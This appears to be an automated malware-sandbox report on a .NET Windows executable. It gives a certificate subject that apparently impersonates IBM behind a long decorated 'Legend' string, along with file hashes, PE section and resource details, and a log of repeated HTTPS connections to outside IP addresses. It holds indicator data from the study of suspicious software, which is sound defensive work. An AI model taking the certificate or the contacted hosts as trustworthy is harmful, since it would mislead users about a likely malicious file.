Le\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48\u0f3aLe\u0365ge\u0363n\u036bd\u0f3b\u1d33\u1d52\u1d48, OU=Digital combo IBM USA, O=Digital combo IBM USA, CN=IBM USA
Version:	3
Thumbprint MD5:	FF9BD375F6BEFEEFC6E6C8428D0D9366
Thumbprint SHA-1:	DD4743B182FE81D90418532800C587E6407E949B
Thumbprint SHA-256:	5DD64715599474AE66D57DDA087E9B8ED5874FA653F654D1E3D1C3A2F9D20D6D
Serial:	34DD621E6C0B1444B819139493D93372

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x38b290	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38c000	0x2c81c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x3b6200	0xbbd0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3ba000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3892e4	0x389400	9f29ede580a51827a03a0be1545b945d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x38c000	0x2c81c	0x2ca00	1c9eed8d12447a990f3c2330ae188eb8	False	0.6406851803221288	data	7.12911871663423	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3ba000	0xc	0x200	d19da5fee6f3a57b802bd63f61261719	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
TYPELIB	0x38c394	0x6e0	data	English	United States	0.3164772727272727
RT_ICON	0x38ca74	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.7640712945590994
RT_ICON	0x38db1c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216			0.6689834024896265
RT_ICON	0x3900c4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384			0.6143127066603684
RT_ICON	0x3942ec	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536			0.4592008754288418
RT_ICON	0x3a4b14	0xe90b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			1.0002849528151663
RT_DIALOG	0x3b3420	0x5bc	data	English	United States	0.388283378746594
RT_DIALOG	0x3b39dc	0x350	data	English	United States	0.38325471698113206
RT_STRING	0x3b3d2c	0x3e	data	English	United States	0.7096774193548387
RT_RCDATA	0x3b3d6c	0x4507	C source, ASCII text, with CRLF line terminators	English	United States	0.19387697357251996
RT_GROUP_ICON	0x3b8274	0x4c	data			0.7894736842105263
RT_VERSION	0x3b82c0	0x304	data	English	United States	0.42875647668393785
RT_MANIFEST	0x3b85c4	0x256	ASCII text, with CRLF line terminators	English	United States	0.5100334448160535

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2024 09:31:37.707298994 CEST	49675	443	192.168.2.5	23.1.237.91
May 28, 2024 09:31:37.707298994 CEST	49674	443	192.168.2.5	23.1.237.91
May 28, 2024 09:31:37.801034927 CEST	49673	443	192.168.2.5	23.1.237.91
May 28, 2024 09:31:40.368551016 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.368639946 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:40.368731022 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.370043039 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.370078087 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:40.850624084 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:40.850738049 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.856093884 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.856122017 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:40.856446981 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:40.910450935 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.969762087 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.969762087 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:40.969963074 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.436373949 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.436476946 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.436649084 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.503581047 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.503618956 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.503638983 CEST	49706	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.503648996 CEST	443	49706	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.508172989 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.508213043 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.508296013 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.508694887 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.508727074 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.998200893 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:41.998342991 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.999771118 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:41.999802113 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.000061989 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.001360893 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.001405954 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.001456976 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.513803959 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.513854027 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.513880014 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.513907909 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.513968945 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.513992071 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.514013052 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.514076948 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.514159918 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.514216900 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.514261961 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.514276028 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.518723965 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.518749952 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.518810034 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.518826008 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.518851042 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.518894911 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.518922091 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.519180059 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.519216061 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.519243956 CEST	49707	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.519258022 CEST	443	49707	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.560414076 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.560456991 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:42.560566902 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.560964108 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:42.560978889 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.037961960 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.038086891 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.039791107 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.039799929 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.040018082 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.041436911 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.041619062 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.041640043 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.854729891 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.854916096 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.854995966 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.855098009 CEST	49708	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.855139971 CEST	443	49708	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.888840914 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.888894081 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:43.888976097 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.889614105 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:43.889646053 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:44.385123014 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:44.385302067 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:44.386857986 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:44.386888027 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:44.387872934 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:44.389075994 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:44.389206886 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:44.389251947 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:44.389329910 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:44.389343977 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.200329065 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.200579882 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.200655937 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.200691938 CEST	49709	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.200709105 CEST	443	49709	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.289724112 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.289767027 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.289849043 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.290226936 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.290247917 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.787041903 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.787169933 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.788547039 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.788575888 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.789349079 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.790705919 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.790879965 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.790947914 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:45.791040897 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:45.791058064 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.348884106 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.349013090 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.349118948 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.349200964 CEST	49710	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.349241972 CEST	443	49710	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.416647911 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.416745901 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.416848898 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.417324066 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.417357922 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.898735046 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.898999929 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.903636932 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.903693914 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.904156923 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:46.905522108 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.905632019 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:46.905656099 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.316792011 CEST	49674	443	192.168.2.5	23.1.237.91
May 28, 2024 09:31:47.316792011 CEST	49675	443	192.168.2.5	23.1.237.91
May 28, 2024 09:31:47.382020950 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.382276058 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.382411003 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.382741928 CEST	49711	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.382785082 CEST	443	49711	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.401269913 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.401314974 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.401396990 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.401750088 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.401767969 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.410406113 CEST	49673	443	192.168.2.5	23.1.237.91
May 28, 2024 09:31:47.891531944 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.891622066 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.892991066 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.893004894 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.893261909 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:47.894505024 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.894597054 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:47.894606113 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:48.671312094 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:48.671572924 CEST	443	49712	104.21.92.10	192.168.2.5
May 28, 2024 09:31:48.671597958 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:48.671643972 CEST	49712	443	192.168.2.5	104.21.92.10
May 28, 2024 09:31:49.046591043 CEST	443	49705	23.1.237.91	192.168.2.5
